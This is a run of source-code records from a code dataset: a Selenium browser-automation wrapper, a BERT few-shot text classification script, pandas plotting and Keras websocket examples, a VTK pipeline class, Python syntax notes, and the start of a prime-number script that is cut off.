try:\n # self._driver = WebDriverWait(webdriver, 30).until(\n # lambda driver: driver.Chrome(chrome_options=chrome_options,\n # service_log_path=os.path.devnull)\n # )\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Chrome(executable_path='/home/xuxin/drivers/bin/chromedriver',\n chrome_options=chrome_options,\n service_log_path=os.path.devnull)\n )\n except Exception as e:\n return False\n self._driver.implicitly_wait(15)\n self._logger.info(u\"谷歌浏览器启动完成!\")\n time.sleep(0.5)\n return True\n\n except Exception as msg:\n\n self._logger.exception(u\"谷歌浏览器启动异常,异常信息:{}\".format(msg))\n return False, \"浏览器启动失败{}\".format(msg)\n\n def _open(self, web=\"Chrome\", startup_homepage='http://www.baidu.com'):\n\n if \"Chrome\" == web:\n\n return self._open_chrome(startup_homepage)\n\n elif \"Firefox\" == web:\n\n return self._open_firefox(startup_homepage)\n\n else:\n\n return False, \"浏览器不存在\"\n\n def _close(self, web=\"Chrome\"):\n\n if \"Chrome\" == web:\n\n if isinstance(self._driver, webdriver.Chrome):\n\n self._driver.quit()\n self._driver = None\n\n elif \"Firefox\" == web:\n\n if isinstance(self._driver, webdriver.Firefox):\n self._driver.quit()\n self._driver = None\n\n else:\n\n if hasattr(self._driver, \"quit\"):\n self._driver.quit()\n self._driver = None\n self._logger.info(\"关闭浏览器\")\n\n def get_cookies(self):\n\n if self._driver:\n\n try:\n\n return self._driver.get_cookies()\n\n except:\n\n return {}\n\n else:\n\n return {}\n\n def clear_cookies(self):\n\n \"\"\"\n 清理浏览器Cookies缓存\n :return:\n \"\"\"\n if self._driver:\n\n self._driver.delete_all_cookies()\n\n def refresh(self):\n\n if self._driver:\n\n self._driver.refresh()\n time.sleep(random.randint(3, 5))\n\n def set_firefox_incognito_mode(self):\n\n action_element = WebDriverWait(self._driver, 20).until(lambda driver: driver.find_element_by_xpath(\"//body\"))\n action_element.send_keys(Keys.CONTROL, Keys.SHIFT, 'p')\n\n def record_web_status(self, title, save_path=os.path.join(os.getcwd(), \"records\"), html_enable=False):\n\n if not os.path.exists(save_path):\n\n os.makedirs(save_path)\n self._driver.get_screenshot_as_file(os.path.join(\n save_path,\n 'image_' + title + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + '.png'\n ))\n\n if html_enable:\n\n with open(os.path.join(\n save_path,\n \"html_\" + title + '_' + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + \".html\"\n ), \"wb\") as _w:\n _w.write(self._driver.page_source)\n\n def open_browser(self, startup_homepage=\"https://twitter.com\"):\n\n \"\"\"\n 启动浏览器\n :param startup_homepage: 启动页面\n :param proxy: 代理\n :return: True, 成功;False, 失败\n \"\"\"\n return self._open(startup_homepage=startup_homepage)\n\n def check_browser(self, current_url=\"https://twitter.com\"):\n\n \"\"\"\n 检测当前页面\n :param current_url:\n :return:\n \"\"\"\n if current_url in self._driver.current_url:\n\n self._logger.info(\"Twitter首页打开成功\")\n return True\n\n return False\n\n def close_browser(self):\n\n self._close()\n\n def find_element_by_xpath(self, xpath, description=\"ELEMENT\", exception=True, timeout=60):\n\n element = None\n try:\n element = WebDriverWait(self._driver, timeout).until(\n lambda driver: driver.find_element_by_xpath(xpath)\n )\n except TimeoutException:\n if exception:\n self._logger.error(\"{}锁定超时\".format(description))\n self.record_web_status(description)\n except Exception as msg:\n self._logger.exception(\"{}锁定异常,异常信息:{}\".format(description, msg))\n self.record_web_status(description)\n finally:\n return element\n\n def find_element_by_xpath_with_click(self, xpath, description=\"BUTTON\"):\n\n try:\n button_element = self.find_element_by_xpath(xpath, description)\n if button_element:\n button_element.click()\n time.sleep(random.randint(2, 3))\n self._logger.info(\"{}按钮点击完成\".format(description))\n return button_element\n else:\n self._logger.error(\"{}按钮点击失败\".format(description))\n return False\n except Exception as msg:\n self._logger.exception(\"{}锁定点击异常,异常信息:{}\".format(description, msg))\n return False\n\n def find_element_by_xpath_with_send_keys(self, xpath, text, description=\"TEXT\"):\n\n try:\n text_element = self.find_element_by_xpath(xpath, description)\n if text_element:\n time.sleep(0.5)\n text_element.send_keys(text)\n time.sleep(random.randint(2, 3))\n self._logger.info(\"{}内容填充完成\".format(description))\n return True\n else:\n self._logger.error(\"{}内容填充失败\".format(description))\n return False\n except Exception as msg:\n self._logger.exception(\"{}内容填充异常,异常信息:{}\".format(description, msg))\n return False\n\n def __del__(self):\n\n pass\n","sub_path":"core/browserdriver/webdriver_bak.py","file_name":"webdriver_bak.py","file_ext":"py","file_size_in_byte":11167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364332935","text":"import torch\nfrom transformers import *\nimport numpy as np\nfrom utils import *\nfrom utils_model import *\n\nmodel_class = BertModel\ntokenizer_class = BertTokenizer\npretrained_weights = 'bert-base-uncased'\nmodel = model_class.from_pretrained(pretrained_weights)\ntokenizer = tokenizer_class.from_pretrained(pretrained_weights)\n\ndef get_bert_embedding_single(model, tokenizer, input_text):\n input_ids = torch.tensor([tokenizer.encode(input_text)])\n last_hidden_states = model(input_ids)[0].cpu().detach().numpy()\n last_hidden_states = last_hidden_states[:, 0, :]\n last_hidden_states = last_hidden_states.flatten()\n return last_hidden_states\n\ndef get_bert_embedding(model, tokenizer, input_text_list, embedding_size=768):\n extracted_features_list = np.zeros((len(input_text_list), embedding_size))\n for i, input_text in enumerate(input_text_list):\n extracted_features = get_bert_embedding_single(model, tokenizer, input_text)\n extracted_features_list[i, :] = extracted_features\n return extracted_features_list\n\ndef get_sentence_list(txt_path):\n lines = open(txt_path, 'r').readlines()\n lines = [x.split('\\t')[-1][:-1] for x in lines]\n return lines\n\n# extracted_features_list = get_bert_embedding(model, tokenizer, ['hello i am jason', 'i like machine learning'])\n\nimport config as config\nfrom utils import *\nfrom utils_model import *\n\ndataset_name = \"imdb\"\ndata_folder = config.data_folders[dataset_name]\nnum_classes = config.num_classes_dict[dataset_name]\nssl_folder = data_folder.joinpath(\"ssl\")\nword2vec_pickle = f\"word2vec/{dataset_name}_w2v.pkl\"\nword2vec = load_pickle(word2vec_pickle)\n\ntrain_txt_path = data_folder.joinpath(\"train.txt\")\ntest_txt_path = data_folder.joinpath(\"test.txt\")\n\ntrain_lines = get_sentence_list(train_txt_path)\ntest_lines = get_sentence_list(test_txt_path)\n\ntrain_extracted_features = get_bert_embedding(model, tokenizer, train_lines)\ntest_extracted_features = get_bert_embedding(model, tokenizer, test_lines)\n\ntrain_x, train_y = get_x_y(train_txt_path, num_classes, word2vec_len=300, input_size=40, word2vec=word2vec)\ntest_x, test_y = get_x_y(test_txt_path, num_classes, word2vec_len=300, input_size=40, word2vec=word2vec)\ntest_y_list = one_hot_numpy_to_list(test_y)\n\nk_per_class_to_n_voters = {\t1: 1,\n 2: 1,\n 3: 1, \n 5: 3,\n 10: 3,\n 20: 5}\n\nfor k_per_class, n_voters in k_per_class_to_n_voters.items():\n calculate_few_shot_acc(train_extracted_features, train_y, test_extracted_features, test_y, num_classes, k_per_class, n_voters)\n\nk_per_class_svm = [100, 200, 500, 1000]\n\nfor k_per_class in k_per_class_svm:\n calculate_svm_acc(train_extracted_features, train_y, test_extracted_features, test_y, num_classes, k_per_class)","sub_path":"code/3imdb_6c_bert.py","file_name":"3imdb_6c_bert.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228616207","text":"#coding:iso-8859-9 Türkçe\r\n# p_32502a.py: Pandas veri çerçevesinin çizgi grafik olarak kullanılması örneği.\r\n\r\nimport matplotlib.pyplot as mp\r\nimport pandas as pd\r\n\r\nmp.style.use (\"dark_background\")\r\n\r\nşehirler = {\"ad\":\r\n [\"Londra\", \"Berlin\", \"Madrid\", \"Roma\", \"Paris\", \"Viyana\", \"Buçarest\",\r\n \"Hamburg\", \"Budapeşte\", \"Varşova\", \"Barselona\", \"Münih\", \"Milano\"],\r\n \"nüfus\":\r\n [8615246, 3562166, 3165235, 2874038, 2273305, 1805681, 1803425,\r\n 1760433, 1754000, 1740119, 1602386, 1493900, 1350680],\r\n \"yüzölçümü\":\r\n [1572, 891.85, 605.77, 1285, 105.4, 414.6, 228,\r\n 755, 525.2, 517, 101.9, 310.4, 181.8] }\r\n\r\nveriÇerçevesi = pd.DataFrame (şehirler,\r\n columns=[\"nüfus\", \"yüzölçümü\"],\r\n index=şehirler [\"ad\"] )\r\n\r\nprint (\"Şehirler veri çerçevesi:\\n\", veriÇerçevesi, sep=\"\")\r\n\r\nveriÇerçevesi [\"yüzölçümü\"] *=1000\r\nveriÇerçevesi.plot()\r\nmp.show()\r\n#-------------------------------------------------------------------------------------------------------\r\n\r\nveriÇerçevesi.plot (\r\n xticks=range (len (veriÇerçevesi.index)),\r\n use_index=True) # X-eksende şehir adları tam yansıyacak...\r\nmp.show() # Şehir adları üst-steyse pencereyi tam aç, yada...\r\n#-------------------------------------------------------------------------------------------------------\r\n\r\nveriÇerçevesi.plot (\r\n xticks=range (len (veriÇerçevesi.index)),\r\n use_index=True,\r\n rot=90) # X-eksende şehir adları dikey yansıyacak...\r\nmp.show() # Şehir adları alttaysa, Configure-subplots->bottom ayarını artır...\r\n","sub_path":"Bernd Klein (520) ile Python/p_32502a.py","file_name":"p_32502a.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"584286264","text":"import json\nimport websocket\nimport time\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nimport os\nimport numpy as np\nimport pandas as pd\nimport sys\n\n\nImageData_path = 'ImageData'\nModel_path = 'ModelPath'\nflag = True\nheader = {\n \"CommandHandler\": \"AIColor\",\n \"CommandName\": \"RegistComm\",\n \"ParamsJson\": \"\"} # 注册信息需要为 Json 格式\n#header = dict(header)\nheader = json.dumps(header)\nimg_type = 'jpg'\npath = \"./\"\nmodel_path = \"F:/jupyter/pycharm/keras_tutorial/pyqt5_tool_demo/ALcolor/ModelPath/1555812970.2107625.h5\"\nmodel = ''\n\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\n\ndef on_message(ws, message):\n global img_type, model_path, path\n print(time.ctime())\n message = json.loads(message)\n img_name = message['msg']['Msg']['ImgFile'] # 得到的是图片的文件名,不包括路径和后缀\n img_path = path + img_name + '.' +img_type # 图片集路径 + 图片名 + . + 后缀\n if os.path.exists(img_path) == False: # 判断文件是否存在\n print(\"图片文件不存在,请检查图片名或图片类型\") # 通信协议上要约定若文件不存在时的情况\n img_array = img_processing(img_path) # 将图片转换成张量\n result = img_predict(model, img_array) # 对图片进行预测\n # 发送回去服务端 待写。。。。。\n #############\n pass\n\n print(np.argmax(result))\n print(time.ctime())\n if message['msg']['Msg']['Wood'] == 'end': # 通信协议加上结束运行的参数\n ws.close()\n\n\n\ndef on_error(ws, error):\n print(error)\n\n\ndef on_close(ws):\n print(\"### closed ###\")\n\n\ndef on_open(ws):\n def run(*args):\n ws.send(header)\n print(\"thread terminating...\")\n\n thread.start_new_thread(run, ())\n\n\n\ndef guide_txt():\n \"\"\"\n 信息提示语\n :return:\n \"\"\"\n global add, img_type, path, model\n\n # 服务器开启提示语\n print(\"AI COLOR 服务\")\n print(\"请确认服务端是否开启 yes/no:\")\n print(\"1: yes\", \"2: no\", sep='\\n')\n start_flag = input()\n while 1:\n if start_flag == '1':\n break\n else:\n print(\"请开启后重试\")\n start_flag = input()\n print(\"请输入服务器地址: ip:port\") # 从配置文件中读取,若有新输入,保存\n print(\"历史记录:\", \"1: xx\", \"2: xx\", sep='\\n')\n add = '127.0.0.1:2019'#input()\n add = 'ws://' + add\n\n # 选择图片类型\n print(\"数据集文件名为 ImageData:\")\n print(\"请选择本次识别图像的类型\")\n configure_content = pd.read_csv(\"./configure.csv\") # 配置文件内容\n img_type_dict = dict()\n for i, content in enumerate(list(configure_content['img_type'])):\n print(i, \":\", content)\n img_type_dict[i] = content\n while 1:\n try:\n img_type_flag = int(eval(input(\"请选择\")))\n break\n except:\n print(\"请输入数字\")\n while 1:\n try:\n if img_type_flag in list(img_type_dict.keys()):\n # print(img_type_flag)\n img_type = img_type_dict[img_type_flag]\n print(\"所选图片类型为:%s\" % img_type)\n break\n else:\n print(\"请重新选择\")\n img_type_flag = int(eval(input(\"请选择\")))\n except:\n print(\"重试\")\n\n\n # 读取图片集路径\n now_path = os.getcwd()\n a = 1\n n = len(now_path.split(\"\\\\\"))\n while not (ImageData_path in os.listdir(now_path)):\n #print(\"1:\", now_path)\n a += 1\n n = len(now_path.split(\"\\\\\")[-1]) + 1\n now_path = now_path[:-n]\n if a == n-2:\n print(\"请检查图片路径 %s 是否存在\" % ImageData_path)\n print(\"系统 5s 后退出...\")\n time.sleep(5)\n try:\n os._exit(0)\n except:\n print('Program is dead.')\n path = now_path + \"\\\\\" + ImageData_path + str(\"\\\\\") # 图片的路径,当前路径找不到,会一直往上找\n #print(\"图片路径:\", path)\n\n\n # 获取模型路径 当前路径找不到,会一直往上找\n model_path = os.getcwd()\n a = 1\n n = len(model_path.split(\"\\\\\"))\n while not (Model_path in os.listdir(model_path)):\n #print(now_path)\n a += 1\n n = len(model_path.split(\"\\\\\")[-1]) + 1\n model_path = model_path[:-n]\n if a == n - 2:\n print(\"请检查模型路径 %s 是否存在\" % Model_path)\n print(\"系统 5s 后退出...\")\n time.sleep(5)\n try:\n os._exit(0)\n except:\n print('Program is dead.')\n model_path = model_path + \"\\\\\" + Model_path + \"\\\\\"\n\n # 从配置文件中读取模型文件名\n model_dict = dict()\n for i, content in enumerate(list(configure_content['model'])):\n print(i, \":\", content)\n model_dict[i] = content\n while 1:\n try:\n model_name_flag = int(eval(input(\"请选择\")))\n break\n except:\n print(\"请输入数字\")\n while 1:\n try:\n if model_name_flag in list(model_dict.keys()):\n # print(img_type_flag)\n model_name = model_dict[model_name_flag]\n print(\"所选的模型为:%s\" % model_name)\n break\n else:\n print(\"请重新选择\")\n img_type_flag = int(eval(input(\"请选择\")))\n except:\n print(\"重试\")\n\n #model_name = '1555812970.2107625.h5'\n\n # 获取模型,获取不到就会直接退出\n try:\n model_path = model_path + model_name # 模型的路径(F:\\jupyter\\pycharm\\keras_tutorial\\pyqt5_tool_demo\\ALcolor\\)+模型的名字\n model = load_model(model_path) # 模型读取,放在这里性能更好\n except:\n print(\"无法找到模型,请重试...\")\n print(\"系统 5s 后退出...\")\n time.sleep(5)\n try:\n os._exit(0)\n except:\n print('Program is dead.')\n\n\ndef img_processing(img_path, target_size=150):\n img = image.load_img(img_path, target_size=(target_size, target_size))\n img_array = image.img_to_array(img)\n img_array = img_array / 255.\n img_array = img_array.reshape(-1, target_size, target_size, 3)\n return img_array\n\ndef img_predict(model, img_array):\n result = model.predict(img_array)\n return result\n\n\nif __name__ == \"__main__\":\n guide_txt()\n websocket.enableTrace(False) # 不显示报文\n ws = websocket.WebSocketApp(url=add, # 'ws://127.0.0.1:2019'\n on_message=on_message,\n on_error=on_error,\n on_close=on_close)\n ws.on_open = on_open\n ws.run_forever()\n\n\n\n","sub_path":"pycharm/keras_tutorial/pyqt5_tool_demo/AIcolor/pyqt5_demo_v10.py","file_name":"pyqt5_demo_v10.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"136062174","text":"#int\ninteger_number = 90\n\n#浮点\nfloat_number = 90.4\n \n#复数\ncomplex_number = 10 + 10j\n \n#list 序列\nsample_list = [1,2,3,'abc']\n \n#dictionary 字典\nsample_dic = {\"key\":value, 2:3}\n \n#tuple 只读的序列\nsample_tuple = (1,3,\"ab\")\n \n#嵌套\nsample_nest = [(1,2,3),{1:2,3:4,'key':[1,2]},3]\n\n#everythind is object\n'str str'.split() #['str', 'str']\n1..is_integer() #True\nis_integer(1) #True\n1.0.is_integer() #False\n[3, 2, 1].sort()\nsort([2, 1, 3])\n\n#if True: elif flag2: else:\n\nfor i in range(0, 1):\n print(i)\n\nfor i in ['a', 'b', 'c']:\n print(i)\n\n \n\n","sub_path":"doc/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"452559121","text":"#\n# Created by: Henk Dreuning\n# Student number: 10550461\n# Date: 08-06-2016\n#\n\nfrom vtk import *\nfrom PipelineObject import *\nfrom copy import deepcopy\n\n# Class that wraps a VTK class in the classTree and determines its\n# characteristics.\nclass TreeObject():\n def __init__(self, classType, eo):\n self.classType = classType\n self.eo = eo\n\n self.isAbstract = None\n self.implemented = None\n \n self.subclasses = None\n self.implementedSubclasses = None\n self.acceptsCache = {}\n self.onOffMethods = []\n self.setToMethods = []\n self.setValueMethods = []\n\n self.categories = []\n\n self.buildSubtree()\n self.parseMethods()\n\n def parseMethods(self):\n # Only parse methods if this is not an abstract class.\n if self.isAbstract:\n return\n \n dummyNode = self.classType()\n\n # Get methods of the different types.\n setValueMethods, setToMethods = utils.getSetMethods(dir(dummyNode))\n onOffMethods = utils.getOnOffMethods(dir(dummyNode))\n getMethods = utils.getGetMethods(dir(dummyNode))\n\n # Group their accompanying 'get' methods.\n setValueMethods, ogm1 = self.groupGetMethods(\"setValueMethod\", setValueMethods, getMethods)\n setToMethods, ogm2 = self.groupGetMethods(\"setToMethod\", setToMethods, getMethods)\n onOffMethods, ogm3 = self.groupGetMethods(\"onOffMethod\", onOffMethods, getMethods)\n\n # Note: setValueMethods, setToMethods and onOffMethods now contain\n # tuples with (setValueMethod, GetMethod), (setToMethod, GetMethod)\n # and (onOffMethod, GetMethod) respectively.\n\n # Remove unused (obsolete) 'get' methods.\n obsoleteGetMethods = ogm1 + ogm2 + ogm3\n getMethods = self.removeObsoleteGetMethods(obsoleteGetMethods, getMethods)\n setValueMethods = self.removeObsoleteSetValueMethods(onOffMethods,\n setToMethods, setValueMethods)\n\n # Group all setTo methods that operate on the same property.\n # Idem for OnOff methods.\n # Determine return and argument types for setValue methods.\n self.parseSetToMethods(setToMethods, dummyNode)\n self.parseOnOffMethods(onOffMethods, dummyNode)\n self.parseSetValueMethods(setValueMethods, dummyNode)\n\n def parseSetToMethods(self, setToMethods, dummyNode):\n # Group all setTo methods that operate on the same property.\n\n attributes = {}\n for setMethod, getMethod in setToMethods:\n # Take \"Get\" off the front\n attributeName = getMethod[3:]\n\n # Add to the list of Set*To* methods for this attribute.\n if attributeName in attributes:\n attributes[attributeName][\"setToMethods\"].append([setMethod, False])\n else:\n # Also save the current (default) value. The accompanying\n # Set*To* method is set al selected later.\n attributes[attributeName] = {\"getMethod\": getMethod,\n \"setToMethods\": [[setMethod, False]]}\n\n toRemove = []\n\n # Set the currently 'active' (default) Set*To* methods as selected.\n for attribute, methods in attributes.items():\n\n getMethod = methods[\"getMethod\"]\n defaultValue = getattr(dummyNode, getMethod)()\n\n for i, [setToMethod, isSelected] in enumerate(methods[\"setToMethods\"]):\n # Set this value and check if it equals default\n try:\n getattr(dummyNode, setToMethod)()\n except:\n # Skip this option\n # print \"Skipping\", setToMethod, getMethod, self.classType.__name__\n toRemove.append((attribute, i))\n continue\n\n value = getattr(dummyNode, getMethod)()\n\n if value == defaultValue:\n # Set as selected \n methods[\"setToMethods\"][i][1] = True\n break\n\n # Remove the skipped options\n for attribute, i in toRemove:\n key = list(attributes[attribute].keys())[i]\n del attributes[attribute][key]\n\n self.setToMethods = attributes\n\n def parseOnOffMethods(self, onOffMethods, dummyNode):\n # Group all onOff methods that operate on the same property.\n # Only saves property's name and the getMethod.\n\n onOffMethodsDict = {}\n\n for i, (attributeName, getMethod) in enumerate(onOffMethods):\n # Select default value\n value = getattr(dummyNode, getMethod)()\n onOffMethodsDict[attributeName] = [getMethod, value]\n\n self.onOffMethods = onOffMethodsDict\n\n def parseSetValueMethods(self, setValueMethods, dummyNode):\n # Determine return and argument types for setValue methods.\n\n setValueMethodsDict = {}\n \n # For experiments: check if this is a vtkContourFilter,\n # used to add the 'SetValue' method manually.\n isContourFilter = False\n if self.classType == vtkContourFilter:\n isContourFilter = True\n\n\n for setMethod, getMethod in setValueMethods:\n methodSignatures = utils.getMethodSignature(dummyNode, setMethod)\n setTypes = utils.evalTypes(methodSignatures, setMethod)\n\n methodSignatures = utils.getMethodSignature(dummyNode, getMethod)\n getTypes = utils.evalTypes(methodSignatures, getMethod)\n\n # getTypes and setType are of the form:\n # [returntype, (argument type, argument type, ...)]\n\n # Currently only the first method signature is used.\n\n basicTypes = [int, float, str]\n \n if (getTypes[0][0] in basicTypes and getTypes[0][1] == \"void\"\n and setTypes[0][1] in basicTypes):\n value = getattr(dummyNode, getMethod)()\n setValueMethodsDict[setMethod] = {\"getMethod\": getMethod,\n \"value\": value,\n \"getReturnType\": getTypes[0][0],\n \"getParameterTypes\": getTypes[0][1],\n \"setReturnType\": setTypes[0][0],\n \"setParameterTypes\": setTypes[0][1]}\n \n # For experiments: 'manually' add SetValue method if this is a\n # vtkContourFilter.\n if isContourFilter and setMethod == \"SetValue\":\n setValueMethodsDict = self.addSetValueContourFilter(\n setValueMethodsDict, dummyNode, setMethod, getMethod)\n \n self.setValueMethods = setValueMethodsDict\n\n # For experiments: if this is a vtkContourFilter, add the 'SetValue'\n # method manually.\n def addSetValueContourFilter(self, setValueMethodsDict, dummyNode, setMethod, getMethod):\n value = getattr(dummyNode, getMethod)(0)\n setValueMethodsDict[setMethod] = {\"getMethod\": getMethod,\n \"value\": value,\n \"getReturnType\": float,\n \"getParameterTypes\": \"void\",\n \"setReturnType\": \"void\",\n \"setParameterTypes\": float}\n\n return setValueMethodsDict\n\n def groupGetMethods(self, methodType, methodNames, getMethods):\n # Group the accompanying 'get' method for setTo/setValue/onOff methods.\n\n obsoleteGetMethods = []\n newMethodNames = []\n\n # Iterate over a copy of methodNames, as we might modify it in the else\n # clause.\n for methodName in methodNames[:]:\n getMethod = self.renameToGetMethod(methodType, methodName)\n\n if getMethod in getMethods:\n # change methodName into a tuple containing:\n # (setValueMethod/setToMethod/onOffMethod, getMethod)\n newMethodNames.append((methodName, getMethod))\n\n # Remove getMethod from getMethods, since value is of no\n # interest to show anywhere else.\n obsoleteGetMethods.append(getMethod)\n\n else:\n # setValueMethod has no get method, don't show it\n methodNames.remove(methodName)\n\n return newMethodNames, obsoleteGetMethods\n\n def removeObsoleteGetMethods(self, obsoleteGetMethods, getMethods):\n # Remove obsolete get methods\n for getMethod in obsoleteGetMethods:\n # Doubles can exist (i.e. both MethodOn/MethodOff and SetMethod\n # exist), so catch ValueError (not in list).\n try:\n getMethods.remove(getMethod)\n except ValueError:\n pass\n\n return getMethods\n\n def removeObsoleteSetValueMethods(self, onOffMethods, setToMethods, setValueMethods):\n # Remove Set methods if there already are On/Off\n # methods.\n for attributeName, getMethod in onOffMethods:\n if (\"Set\" + attributeName, getMethod) in setValueMethods:\n setValueMethods.remove((\"Set\" + attributeName, getMethod))\n # print \"removed obsolete Set Method\", \"Set\" + attributeName\n\n # Remove Set methods if there already are\n # SetTo methods.\n for _, getMethod in setToMethods:\n setMethod = \"Set\" + getMethod[3:]\n if (setMethod, getMethod) in setValueMethods:\n setValueMethods.remove((setMethod, getMethod))\n # print \"removed obsolete Set Method\", setMethod\n\n return setValueMethods\n\n\n def renameToGetMethod(self, methodType, methodName):\n # Given a setTo, setValue or onOff method, get the name of the\n # accompanying 'get' method.\n\n if (methodType == \"setValueMethod\"):\n return \"G\" + methodName[1:]\n\n elif (methodType == \"setToMethod\"):\n baseMethodName = re.sub(\"To\\w+$\", \"\", methodName)\n return \"G\" + baseMethodName[1:]\n \n elif (methodType == \"onOffMethod\"):\n return \"Get\" + methodName\n\n\n def buildSubtree(self):\n # This will create TreeObjects for all subclasses (recursively)\n # and determine if this vtk class (type) is abstract and implemented.\n # The tree can be used for selecting a new node to add to the pipeline. \n subclasses = self.classType.__subclasses__()\n self.subclasses = []\n\n for subClassType in subclasses:\n subClassTreeObject = TreeObject(subClassType, self.eo)\n self.subclasses.append(subClassTreeObject)\n \n self._determineIsAbstract()\n # This will set both self.implemented and\n # fill self.implementedSubclasses\n self._isImplemented()\n\n def _determineIsAbstract(self):\n # Instantiate to test if class is abstract\n try:\n _ = self.classType()\n self.isAbstract = False \n except (TypeError, NotImplementedError):\n self.isAbstract = True\n\n def _isImplemented(self):\n if self.implemented == None:\n self._determineIsImplemented()\n\n return self.implemented\n\n def _determineIsImplemented(self):\n implemented = None\n \n # Test subclasses, first check if they have been built\n if self.subclasses == None:\n message = \"Subclasses not built, cannot check if implemented\"\n raise Exception(message)\n else:\n self.implementedSubclasses = []\n\n # For each class, check if it is implemented\n implemented = False\n for subClass in self.subclasses:\n if subClass._isImplemented():\n implemented = True\n self.implementedSubclasses.append(subClass)\n\n # Concrete classes are always implemented (by themselves), but the\n # previous loop is executed anyways to fill 'implementedSubclasses'.\n if not self.isAbstract:\n implemented = True\n\n self.implemented = implemented\n\n def _getImplementedSubclasses(self):\n if self.implementedSubclasses == None:\n self._determineIsImplemented()\n\n return self.implementedSubclasses\n\n def listImplementedSubclasses(self):\n for i, subClass in enumerate(self.implementedSubclasses):\n print(\"[{}]: {}\".format(i, subClass.classType.__name__))\n\n def acceptsAsInput(self, outputPort, prevNodeTypeName=None, prevNode=None):\n # Only test self if self is not abstract. \n if self.isAbstract:\n return False\n\n # First try if a result was cached\n if prevNodeTypeName != None:\n try:\n return self.acceptsCache[prevNodeTypeName]\n except KeyError:\n pass\n\n # Test if self has the right amount of input/output ports.\n \n dummyNode = self.classType()\n\n # Only list single output objects (for linear pipeline)\n if dummyNode.GetNumberOfOutputPorts() > 1:\n return False\n\n # Only list no input objects for source objects\n if outputPort == None:\n if dummyNode.GetNumberOfInputPorts() != 0:\n return False\n else:\n # No input needed, so list this one\n return True\n\n # Only use objects with one or more input ports (for non-source\n # objects).\n else:\n if dummyNode.GetNumberOfInputPorts() < 1:\n return False\n\n # The object has the correct amount of input and output ports, check\n # if the output is accepted now:\n\n # Reset error handler/observer\n self.eo.ErrorOccurred()\n\n # Test if self accepts outputPort as input\n dummyNode.SetInputConnection(prevNode.vtkInstanceCall(\"GetOutputPort\"))\n dummyNode.UpdateInformation()\n\n\n if not self.eo.ErrorOccurred():\n # Cache the result\n if prevNodeTypeName != None:\n self.acceptsCache[prevNodeTypeName] = True\n \n return True\n\n # Cache the result\n if prevNodeTypeName != None:\n self.acceptsCache[prevNodeTypeName] = False\n \n return False\n\n def createHashTable(self, hashTable):\n # Adds this TreeObject and its subclasses to a hash table/dictionary\n # with class names/TreeObjects as key/value pairs.\n\n className = self.classType.__name__\n hashTable[className] = self\n for subClass in self.subclasses:\n hashTable = subClass.createHashTable(hashTable)\n\n return hashTable\n\n def createNode(self):\n # Create a pipelineObject with which wraps a vtkInstance of the class\n # that this TreeObject represents, and return it.\n\n # This method should not be called for abstract classes.\n if self.isAbstract:\n raise Exception(\"Cannot instantiate abstract class.\")\n\n # Instantiate vtkInstance\n vtkInstance = self.classType()\n\n # Copy attribute methods and current (default) values\n methods = [deepcopy(self.setToMethods), deepcopy(self.onOffMethods),\n deepcopy(self.setValueMethods)]\n\n # Wrap in pipelineObject\n pipelineObject = PipelineObject(vtkInstance, methods)\n\n # print \"Created node:\", pipelineObject, pipelineObject.vtkInstance\n return pipelineObject\n\n def setCategories(self, categories, mapping):\n # Determine the categories that this class belongs to and store it.\n\n className = self.classType.__name__\n categories = self.checkCategory(className, categories, mapping)\n\n for subClass in self.subclasses:\n categories = subClass.setCategories(categories, mapping)\n \n return categories\n \n def checkCategory(self, className, categories, mapping):\n # Determine the categories that this class belongs to.\n\n categorized = False\n \n for category in categories.keys():\n if category in className:\n categorized = True\n if type(categories[category]) == list:\n self.categories.append(category)\n categories[category].append(className)\n else:\n categories[category] = self.checkCategory(className,\n categories[category], mapping)\n\n if not categorized:\n if \"Miscellaneous\" not in categories:\n categories[\"Miscellaneous\"] = []\n\n categories[\"Miscellaneous\"].append(className)\n # If self.categories is going to be used, it should be set here\n # as well.\n\n return categories","sub_path":"TreeObject.py","file_name":"TreeObject.py","file_ext":"py","file_size_in_byte":16934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"468380523","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 13 20:10:41 2018\r\n\r\n@author: Ty Stinson.\r\nHello, this is the Prime Project. This program allows us to explore the beauty of prime numbers.\r\nJust press play to open up an interactive menu.\r\n\"\"\"\r\n\r\n\r\nimport math\r\nimport turtle as t\r\nfrom turtle import *\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom scipy import stats\r\nimport math \r\n\r\n\r\n\r\n\r\n#Calculates the greatest common denominator between two integers\r\ndef GCD(a,b):\r\n r = a % b\r\n if(r != 0):\r\n return GCD(b,r)\r\n else:\r\n return b\r\n \r\n \r\n#Generates the set of prime number within the range given then returns a sorted list\r\ndef prime(n):\r\n primes = set()\r\n composites = set()\r\n count = 2\r\n while(count <= n):\r\n if count not in composites:\r\n primes.add(count)\r\n i = count\r\n while(count * i <= n):\r\n multiple = count * i\r\n if multiple not in composites:\r\n composites.add(multiple)\r\n i +=1 \r\n if count == 2:\r\n count +=1\r\n else:\r\n count += 2\r\n return sorted(primes)\r\n\r\n \r\n#Tests the primality of an integer using a trial division \r\ndef trialdivision(n):\r\n factors = []\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if n % i == 0:\r\n if i in prime(n):\r\n factors.append(i)\r\n if(len(factors)==0):\r\n print(\"This number is a prime\")\r\n else:\r\n print(\"This composite number has the following prime factors\")\r\n print(factors)\r\n \r\n #Performs the factorization of an integer using trial division 